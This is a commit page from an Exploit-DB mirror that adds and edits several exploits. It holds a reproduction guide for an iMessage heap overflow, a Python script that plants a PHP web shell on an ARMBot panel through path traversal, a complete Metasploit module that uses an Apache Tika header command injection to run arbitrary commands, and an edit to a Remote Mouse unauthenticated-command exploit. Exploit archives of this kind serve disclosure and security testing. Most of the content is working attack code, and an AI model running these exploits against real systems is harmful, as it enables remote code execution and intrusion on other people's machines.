bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-08-06

Browse source 
4 changes to exploits/shellcodes

macOS iMessage - Heap Overflow when Deserializing
Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit)
ARMBot Botnet - Arbitrary Code Execution
This commit is contained in:
Offensive Security 2019-08-06 05:02:23 +00:00
parent 5cabe1e1de
commit d1ba848ff5
5 changed files with 159 additions and 5 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

18
exploits/macos/dos/47207.txt Normal file
View file

@ -0,0 +1,18 @@
There is a heap overflow in [NSURL initWithCoder:] that can be reached via iMessage and likely other paths. When an NSURL is deserialized, one property its plist can contain is NS.minimalBookmarkData, which is then used as a parameter for [NSURL URLByResolvingBookmarkData:options:relativeToURL:bookmarkDataIsStale:error:]. This method uses a wide variety of code to parse the provided bookmark data. On a Mac, if the data is a pre-2012 alias file, it will be processed using the FSResolveAliasWithMountFlags function in the CarbonCore framework. This function can eventually call ALI_GetUTF8Path, which has an unsafe call to strcat_chk, leading to memory corruption.
To reproduce the issue with the files in carboncrash.zip:
1) install frida (pip3 install frida)
2) open sendMessage.py, and replace the sample receiver with the phone number or email of the target device
3) in injectMessage.js replace the marker "PATH" with the path of the obj file
4) in the local directory, run:
python3 sendMessage.py
This will lead to a crash in soagent requiring no user interaction. Note that this issue affects Macs only, this PoC will crash an iPhone, but it is an unexploitable and unrelated crash due to an exception.
CarbonCore contains a large number of calls to unsafe string handling functions. It also performs a number of operations on file paths that might not be desirable in a remote context. I strongly recommend that this issue be resolved by removing CarbonCore from the NSURL deserialization path.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47207.zip

11
exploits/multiple/remote/47209.py Executable file
View file

@ -0,0 +1,11 @@
import requests
URL = "http://127.0.0.1/ARMBot/upload.php"
r = requests.post(URL,
data = {
"file":"../public_html/lol/../.s.phtml", # need some trickery for each server ;)
"data":"PD9waHAgZWNobyAxOyA/Pg==", # <?php echo 1; ?>
"message":"Bobr Dobr"
}, proxies={"http":"127.0.0.1:8080","https":"127.0.0.1:8080"})
print(r.status_code)
print("shell should be at http://{}/.s.phtml".format(URL))

9
exploits/windows/remote/46697.py
View file

@ -1,6 +1,5 @@
"""
# Exploit Title: Remote Mouse 3.008 Failure to Authenticate
# Date: 4/9/2019
# Exploit Title: Remote Mouse 3.008 - Failure to Authenticate
# Date: 2019-09-04
# Exploit Author: 0rphon
# Software Link: https://www.remotemouse.net/
# Version: 3.008
@ -9,7 +8,7 @@
Remote Mouse 3.008 fails to check for authenication and will execute any command any machine gives it
This script pops calc as proof of concept (albeit a bit slowly)
It also has an index of the keycodes the app uses to communicate with the computer if you want to mess around with it yourself
"""
#!/usr/bin/python2
from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM
@ -96,7 +95,7 @@ characters={
"z":"key 7[ras]79",
"1":"key 6[ras]4", "2":"key 6[ras]7", "3":"key 6[ras]6", "4":"key 6[ras]1", "5":"key 6[ras]0",
"6":"key 6[ras]3", "7":"key 6[ras]2", "8":"key 6[ras]13", "9":"key 6[ras]12", "x0":"key 6[ras]5",
"6":"key 6[ras]3", "7":"key 6[ras]2", "8":"key 7[ras]13", "9":"key 7[ras]12", "0":"key 6[ras]5",
"\n":"key 3RTN", "\b":"key 3BAS", " ":"key 7[ras]21",

123
exploits/windows/remote/47208.rb Executable file
View file

@ -0,0 +1,123 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Powershell
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Tika Header Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability in Apache
Tika 1.15 - 1.17 on Windows. A file with the image/jp2 content-type is
used to bypass magic bytes checking. When OCR is specified in the
request, parameters can be passed to change the parameters passed
at command line to allow for arbitrary JScript to execute. A
JScript stub is passed to execute arbitrary code. This module was
verified against version 1.15 - 1.17 on Windows 2012.
While the CVE and finding show more versions vulnerable, during
testing it was determined only > 1.14 was exploitable due to
jp2 support being added.
},
'License' => MSF_LICENSE,
'Privileged' => false,
'Platform' => 'win',
'Targets' =>
[
['Windows',
{'Arch' => [ARCH_X86, ARCH_X64],
'Platform' => 'win',
'CmdStagerFlavor' => ['certutil']
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 25 2018',
'Author' =>
[
'h00die', # msf module
'David Yesland', # edb submission
'Tim Allison' # discovery
],
'References' =>
[
['EDB', '46540'],
['URL', 'https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/'],
['URL', 'https://lists.apache.org/thread.html/b3ed4432380af767effd4c6f27665cc7b2686acccbefeb9f55851dca@%3Cdev.tika.apache.org%3E'],
['CVE', '2018-1335']
]))
register_options(
[
Opt::RPORT(9998),
OptString.new('TARGETURI', [true, 'The base path to the web application', '/'])
])
register_advanced_options(
[
OptBool.new('ForceExploit', [true, 'Override check result', false])
])
end
def check
res = send_request_cgi({
'uri' => normalize_uri(target_uri),
})
if res.nil?
vprint_error('No server response, check configuration')
return CheckCode::Safe
elsif res.code != 200
vprint_error('No server response, check configuration')
return CheckCode::Safe
end
if res.body =~ /Apache Tika (\d.[\d]+)/
version = Gem::Version.new($1)
vprint_status("Apache Tika Version Detected: #{version}")
if version.between?(Gem::Version.new('1.15'), Gem::Version.new('1.17'))
return CheckCode::Vulnerable
end
end
CheckCode::Safe
end
def execute_command(cmd, opts = {})
cmd.gsub(/"/, '\"')
jscript="var oShell = WScript.CreateObject('WScript.Shell');\n"
jscript << "var oExec = oShell.Exec(\"cmd /c #{cmd}\");"
print_status("Sending PUT request to #{peer}#{normalize_uri(target_uri, 'meta')}")
res = send_request_cgi({
'method' => 'PUT',
'uri' => normalize_uri(target_uri, 'meta'),
'headers' => {
"X-Tika-OCRTesseractPath" => '"cscript"',
"X-Tika-OCRLanguage" => "//E:Jscript",
"Expect" => "100-continue",
"Content-type" => "image/jp2",
"Connection" => "close"},
'data' => jscript
})
fail_with(Failure::Disconnected, 'No server response') unless res
unless (res.code == 200 && res.body.include?('tika'))
fail_with(Failure::UnexpectedReply, 'Invalid response received, target may not be vulnerable')
end
end
def exploit
checkcode = check
unless checkcode == CheckCode::Vulnerable || datastore['ForceExploit']
print_error("#{checkcode[1]}. Set ForceExploit to override.")
return
end
execute_cmdstager(linemax: 8000)
end
end

3
files_exploits.csv
View file

@ -6521,6 +6521,7 @@ id,file,description,date,author,type,platform,port
47192,exploits/multiple/dos/47192.txt,"iMessage - NSArray Deserialization can Invoke Subclass that does not Retain References",2019-07-30,"Google Security Research",dos,multiple,
47193,exploits/multiple/dos/47193.txt,"iMessage - Memory Corruption when Decoding NSKnownKeysDictionary1",2019-07-30,"Google Security Research",dos,multiple,
47194,exploits/multiple/dos/47194.txt,"iMessage - NSKeyedUnarchiver Deserialization Allows file Backed NSData Objects",2019-07-30,"Google Security Research",dos,multiple,
47207,exploits/macos/dos/47207.txt,"macOS iMessage - Heap Overflow when Deserializing",2019-08-05,"Google Security Research",dos,macos,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -17591,6 +17592,8 @@ id,file,description,date,author,type,platform,port
47186,exploits/unix/remote/47186.rb,"Schneider Electric Pelco Endura NET55XX Encoder - Authentication Bypass (Metasploit)",2019-07-29,Metasploit,remote,unix,
47187,exploits/php/remote/47187.rb,"WordPress Plugin Database Backup < 5.2 - Remote Code Execution (Metasploit)",2019-07-29,Metasploit,remote,php,80
47195,exploits/linux/remote/47195.rb,"Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit)",2019-07-30,Metasploit,remote,linux,6379
47208,exploits/windows/remote/47208.rb,"Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit)",2019-08-05,Metasploit,remote,windows,
47209,exploits/multiple/remote/47209.py,"ARMBot Botnet - Arbitrary Code Execution",2019-08-05,prsecurity,remote,multiple,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,

Can't render this file because it is too large.